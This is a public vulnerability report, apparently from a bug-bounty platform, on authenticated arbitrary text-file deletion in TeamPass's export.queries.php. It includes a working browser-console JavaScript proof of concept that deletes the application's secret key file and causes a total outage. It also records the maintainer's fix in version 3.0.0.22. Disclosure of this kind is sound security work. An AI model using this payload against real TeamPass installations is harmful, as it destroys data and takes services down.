Arbitrary txt files deletion (authenticated) in nilsteampassnet/teampass

Valid

Reported on

Jan 21st 2023


Description

The file sources/export.queries.php can be exploited by any authenticated user to remove arbitrary txt files. If the system administrator configured the base path for the teampass-seckey.txt to be /var/teampass, as shown in the official example, it is possible to remove it causing a total disruption of the application (all the pages will return 500 Internal Server Error).

When the attack is executed the original .txt file is deleted and a new file named as the deleted one but without the extension is created. The new file will contain some HTML and the content of the original file encrypted by a password chosen by the attacker, making the recovering of the original file impossible.

Proof of Concept

The following PoC assumes that the Teampass SaltKey is stored to /var/teampass/teampass-seckey.txt.

Login with any user (no special permission is required), open a browser console and execute the following JavaScript:

fetch('http://localhost/teampass/sources/export.queries.php', {
    method: 'POST',
    credentials: 'include',
    body: new URLSearchParams({
        type: 'export_to_html_format_finalize',
        file: '/var/teampass/teampass-seckey',
        pdf_password: 'GoodbyeSecretKey'
    }),
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
})

Impact

This vulnerability can be used by an attacker with low privileges to remove arbitrary txt files. It can lead to a total loss of availability if the path of the teampass-seckey.txt is known.

We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Sonia Zorba modified the report
a year ago
Sonia Zorba
a year ago

Researcher


@admin I'm trying to submit a similar one for version 2.1.27.36 (that looks to be the last Teampass 2 supported version). A pop-up opens complaining about "It looks like you're trying to report multiple occurrences of a vulnerability you've already disclosed" and forces me to edit this submission. The vulnerability that I was trying to submit is almost the same, but for version 2 is more critical since it can be performed also by anonymous users and so has an higher CVSS score. Also the PoC is different. How should I proceed? Thanks

We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back a year ago
We have sent a follow up to the nilsteampassnet/teampass team. We will try again in 4 days. a year ago
Nils Laumaillé
a year ago

Maintainer


@admin I will fix the issue in branch 3. Branch 2 is not maintained anymore.

nilsteampassnet/teampass maintainer has acknowledged this report a year ago
Nils Laumaillé
a year ago

Maintainer


@zonia3000, Fix has been released in commit https://github.com/nilsteampassnet/TeamPass/commit/0af3574caba27a61b16dc25c94fa51ae12d2d967

Nils Laumaillé gave praise a year ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Nils Laumaillé validated this vulnerability a year ago
zonia3000 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nils Laumaillé marked this as fixed in 3.0.0.22 with commit 0af357 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
Sonia Zorba
a year ago

Researcher


Thank you @nilsteampassnet!

to join this conversation